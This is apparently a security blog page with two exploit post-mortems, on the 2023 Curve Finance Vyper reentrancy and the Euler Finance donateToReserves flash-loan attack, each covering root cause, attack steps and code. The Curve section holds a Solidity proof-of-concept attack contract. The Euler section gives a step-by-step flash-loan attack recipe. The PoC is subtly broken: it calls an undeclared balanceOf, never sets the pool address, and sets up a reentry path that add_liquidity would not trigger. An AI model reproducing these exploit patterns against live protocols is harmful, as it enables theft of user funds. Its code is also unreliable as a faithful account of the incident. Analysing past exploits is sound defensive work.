Curve Finance Reentrancy Deep Dive

Tue, 21 Apr 2026 00:00:00 +0000

Overview

On July 30, 2023, multiple Curve Finance pools were exploited due to a reentrancy vulnerability in Vyper compiler versions 0.2.15, 0.2.16, and 0.3.0.

Root Cause

The Vyper compiler’s @nonreentrant decorator was malfunctioning in affected versions. The reentrancy lock storage slot was being incorrectly mapped, causing the guard to not trigger on reentrant calls.

@external
@nonreentrant("lock")
def remove_liquidity(...):
# This should have been protected by reentrancy guard
# but the compiler bug allowed reentrant calls

Attack Flow

Attacker calls add_liquidity() on the vulnerable pool
During the callback (via raw_call), attacker reenters remove_liquidity()
The reentrancy guard fails to block the second call
Pool state is inconsistent — attacker withdraws more than deposited

Proof of Concept

interface ICurvePool {
 function add_liquidity(uint256[2] calldata amounts, uint256 min_mint_amount) external;
 function remove_liquidity(uint256 _amount, uint256[2] calldata min_amounts) external;
}

contract CurveExploit {
 ICurvePool pool;
 bool entered;

 function attack() external {
 pool.add_liquidity([1 ether, 0], 0);
 }

 receive() external payable {
 if (!entered) {
 entered = true;
 pool.remove_liquidity(pool.balanceOf(address(this)), [0, 0]);
 }
 }
}

Key Takeaway

This incident highlights the risk of relying on compiler-level security guarantees. The vulnerability existed not in the Solidity/Vyper source code but in the compiled bytecode. Auditing only the source code would not have caught this bug.

Euler Finance Flash Loan Attack Analysis

Mon, 20 Apr 2026 00:00:00 +0000

Overview

On March 13, 2023, Euler Finance was exploited for approximately $197M through a sophisticated flash loan attack that abused the protocol’s donation mechanism.

Root Cause

Euler’s donateToReserves() function allowed users to donate eTokens to the protocol reserves without a corresponding health check. This enabled attackers to manipulate their debt-to-collateral ratio.

Attack Flow

Flash loan large amount of DAI from Aave
Deposit into Euler → receive eDAI
Mint maximum dDAI (debt tokens) through leveraged borrowing
Call donateToReserves() with eDAI — reduces collateral without repaying debt
Account is now underwater → trigger self-liquidation at a profit
Repay flash loan, keep the difference

Vulnerable Code

function donateToReserves(uint subAccountId, uint amount) external {
 // Missing: health check after donation
 // The function reduces the sender's eToken balance
 // without verifying they remain solvent
 reserves += amount;
 balanceOf[sender] -= amount;
}

Key Takeaway

Any state-changing function that modifies a user’s collateral or debt position must include a health factor check afterward. The donateToReserves() function was audited but the edge case of self-donation leading to insolvency was missed.

Analysis on 0xtracer

Curve Finance Reentrancy Deep Dive

Overview

Root Cause

Attack Flow

Proof of Concept

Key Takeaway

Euler Finance Flash Loan Attack Analysis

Overview

Root Cause

Attack Flow

Vulnerable Code

Key Takeaway